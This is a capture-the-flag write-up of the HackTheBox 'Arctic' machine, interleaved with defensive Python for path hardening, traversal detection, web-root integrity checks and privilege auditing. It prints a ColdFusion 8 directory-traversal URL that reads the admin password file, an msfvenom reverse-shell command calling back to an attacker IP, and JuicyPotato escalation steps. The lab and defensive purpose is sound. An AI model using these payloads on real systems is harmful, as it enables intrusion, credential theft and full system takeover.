HackTheBox

Arctic

Last updated 4 years ago

Overview

Initial Foothold: RCE via the ColdFusion 8 application running on port 8500

Privilege Escalation: abusing SeImpersonatePrivilege with JuicyPotato

Enumeration

Start with port scanning

Port Scanning

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC

After running a full port scan we found only three ports open

Port 8500 looks interesting, so let's enumerate it

Port 8500 Enumeration

There were some directories listed on this port, so let's open them

ColdFusion was running in this directory

ColdFusion is a well-known CMS and has had many vulnerabilities

We can see that the version is ColdFusion 8

We can search for known exploits for this version

Several exploits are available

Start with the directory traversal exploit

According to this exploit, the vulnerability is in the locale parameter of /CFIDE/administrator/enter.cfm (the full payload URL is listed at the end of this page)

Now we will try to read the password using this directory traversal vulnerability

Using that URL payload we got the contents of the password.properties file

Let's look up the hash on crackstation.net

The password is happyday

Using this password, try to log in to the admin section of the site

Successfully logged in as administrator
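The traversal above works because the locale value is joined to a file path and a NUL byte cuts off whatever the application appends after it. The following Python is added here for the defensive side and is not code from this writeup or from ColdFusion: a constructed model of the flawed resolution next to a hardened resolver that rejects NUL bytes and checks that the normalized path stays under its base, plus the indicator checks a WAF rule or log review would use. BASE_DIR is an assumed layout; PAYLOAD is the URL parameter from the references at the end of the page.

```python
import posixpath
from urllib.parse import unquote

# Assumed base directory for locale files; a constructed value, not taken
# from a real ColdFusion install.
BASE_DIR = "/ColdFusion8/wwwroot/CFIDE/administrator/locale"

# The traversal payload this writeup used (the locale= value from the URL in the references).
PAYLOAD = "../../../../../../../../../../ColdFusion8/lib/password.properties%00en"


def naive_resolve(locale_param):
    """Constructed model of the flawed pattern: decode the parameter, join it to
    the base directory, and hand it to a file layer that treats NUL as the end
    of the string. The trailing 'en' in the payload is discarded by that truncation."""
    decoded = unquote(locale_param)
    path = BASE_DIR + "/" + decoded
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]           # C-string style truncation
    return posixpath.normpath(path)


def hardened_resolve(locale_param):
    """Return the resolved path only if it stays inside BASE_DIR; otherwise None."""
    decoded = unquote(locale_param)
    if "\x00" in decoded or "\\" in decoded:
        return None                 # embedded NUL or backslash is never legitimate here
    candidate = posixpath.normpath(BASE_DIR + "/" + decoded)
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None                 # normalized path escaped the base directory
    return candidate


def suspicious_indicators(locale_param):
    """Detection side: reasons a request parameter should be flagged in access logs or a WAF."""
    decoded = unquote(locale_param)   # decode once; ".." hidden as %2e%2e is exposed here
    indicators = []
    if "\x00" in decoded:
        indicators.append("null-byte")
    if ".." in decoded.replace("\\", "/").split("/"):
        indicators.append("dot-dot-segment")
    if "password.properties" in decoded.lower():
        indicators.append("sensitive-file-name")
    return indicators


if __name__ == "__main__":
    print("naive   :", naive_resolve(PAYLOAD))
    print("hardened:", hardened_resolve(PAYLOAD))
    print("flags   :", suspicious_indicators(PAYLOAD))
```

The containment check is what makes the fix hold even when a new encoding trick gets a `..` past the NUL check: whatever the parameter decodes to, the normalized result has to start with the base directory or it is refused.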

Exploitation

There are two ways to exploit this CMS

  1. Using the task scheduler

  2. Using an arbitrary file upload vulnerability

Using Task Scheduler

The CMS has an option for scheduling tasks

Here we can create our own task and then execute it to download a malicious file and run it on the victim machine

But first we need the file path where the downloaded file should be saved

We can get the full file path from the Mappings section of the settings

Now create the task in the scheduler

Before that, create a JSP payload using msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp

Host this file on our machine

And the task is scheduled

Now execute the task: shell.jsp will be downloaded and saved in the /CFIDE/ directory

Launch a netcat listener on our host machine

Execute the payload by browsing to the path where we told the task to save it

Got the reverse shell

Another way

Using Arbitrary File Upload Exploit for ColdFusion

After some googling I found an exploit for ColdFusion 8 (CVE-2009-2265, the upload.py listed at the end of this page) which uploads a file to the web server

In this exploit we just have to provide the address of the web server

Let's use this exploit

The exploit successfully uploaded the payload and also gave us the path from which we can execute it

Setup listener and execute the payload

And we got back the shell
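Both routes above end the same way: a script file (shell.jsp) appears under the web root, either fetched by the scheduled task or written by the upload exploit. As an added example from the defender's side, not code from this writeup or from ColdFusion, the Python below shows the file-integrity check that catches that: snapshot the web root, diff it later, and single out files with executable extensions. The web root layout and file contents are constructed in a temporary directory, and the extension list is an assumption to adapt to the server in question.

```python
import hashlib
import tempfile
from pathlib import Path

# Extensions a ColdFusion/JRun stack would execute if they land under the web
# root. Constructed list for this example; tune it to what your server handles.
SCRIPT_EXTS = {".jsp", ".jspx", ".cfm", ".cfml", ".cfc", ".war", ".jar"}


def snapshot(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    digests = {}
    for path in root.rglob("*"):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_snapshots(before, after):
    """Return the files that appeared, vanished, or changed between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before if p in after and before[p] != after[p]),
    }


def executable_drops(changes):
    """Narrow the diff to files the server would execute: the web-shell case."""
    candidates = changes["added"] + changes["modified"]
    return sorted(p for p in candidates if Path(p).suffix.lower() in SCRIPT_EXTS)


def demo():
    """Constructed web root: take a baseline, then apply the kind of change the writeup describes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "CFIDE" / "administrator").mkdir(parents=True)
        (root / "CFIDE" / "administrator" / "index.cfm").write_text("<cfoutput>admin</cfoutput>\n")
        (root / "CFIDE" / "logo.png").write_bytes(b"\x89PNG constructed placeholder")
        before = snapshot(root)

        # A script file appears under /CFIDE/ (placeholder content, not a payload)
        # and a static asset is altered.
        (root / "CFIDE" / "shell.jsp").write_text("<%-- constructed placeholder --%>\n")
        (root / "CFIDE" / "logo.png").write_bytes(b"\x89PNG constructed placeholder, modified")
        after = snapshot(root)

        changes = diff_snapshots(before, after)
        return changes, executable_drops(changes)


if __name__ == "__main__":
    changes, drops = demo()
    print("changes:", changes)
    print("script files dropped or altered:", drops)
```

In practice the baseline is taken right after deployment and stored off the host, and the diff runs on a schedule; a new .jsp or .cfm under /CFIDE/ on a server whose content never changes is worth an alert on its own.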

Privilege Escalation

After getting a shell from any service, always check the privileges of the user account

SeImpersonatePrivilege was enabled, so we can abuse this token privilege for privilege escalation

You can find more information about this in the foxglovesec post "Abusing Token Privileges For Windows Local Privilege Escalation" listed at the end of this page

For abusing this token we will use JuicyPotato

This exploit requires a reverse shell binary

Generate the reverse shell using msfvenom

Now transfer shell.exe and juicypotato.exe to the Windows host

We will also need a CLSID for this exploit; we can obtain one from the juicy-potato GitHub repo (the Windows_Server_2008_R2_Enterprise list)

We will try the first CLSID

And we got back a reverse shell with elevated privileges
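From the hardening side, the question the privilege check above raises is which service accounts hold token privileges like SeImpersonatePrivilege at all. The Python below is an added example, not code from this writeup or from JuicyPotato: it parses a constructed sample of `whoami /priv` output and reports the high-risk privileges the account holds, counting disabled ones too, because a process that holds the token can enable them. The sample output and the HIGH_RISK set (this box's privilege plus the ones discussed in the foxglovesec post in the references) are the assumptions.

```python
# Constructed sample of `whoami /priv` output for a service account. The
# privilege names are real Windows privileges; the selection is made up here.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Token privileges whose holder can reach SYSTEM or equivalent. The impersonation
# pair is what this box relied on; the rest are from the foxglovesec post in the references.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege",
}


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privileges = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True          # the '=====' rule marks the start of the table body
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        privileges[parts[0]] = parts[-1]   # first column is the name, last is the state
    return privileges


def risky_privileges(privs, include_disabled=True):
    """High-risk privileges held by the account. Disabled ones are kept by default:
    a process holding the token can simply enable them."""
    return sorted(
        name for name, state in privs.items()
        if name in HIGH_RISK and (include_disabled or state.lower() == "enabled")
    )


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print("privileges held:", held)
    print("high risk      :", risky_privileges(held))
```

Run against the account a web application service actually uses, an empty result is the goal; where impersonation is genuinely needed, the usual mitigation is a dedicated low-privileged or virtual service account rather than a shared one, so that an application bug does not hand out a SYSTEM-capable token.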

There is another way to escalate privileges, a kernel exploit; you can find more about kernel exploits in the Optimum box writeup on HTB

That's all for this machine

Good Bye :)

References

  • Abusing Token Privileges For Windows Local Privilege Escalation (foxglovesec)
  • GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM
  • Directory traversal payload used above: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
  • juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise at master · ohpe/juicy-potato (GitHub)
  • Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py · 01a0616a6e09c9dbf42d731261309109443cc3e6 · pentesting / tools (GitLab)
  • Adobe ColdFusion - Directory Traversal (Exploit Database)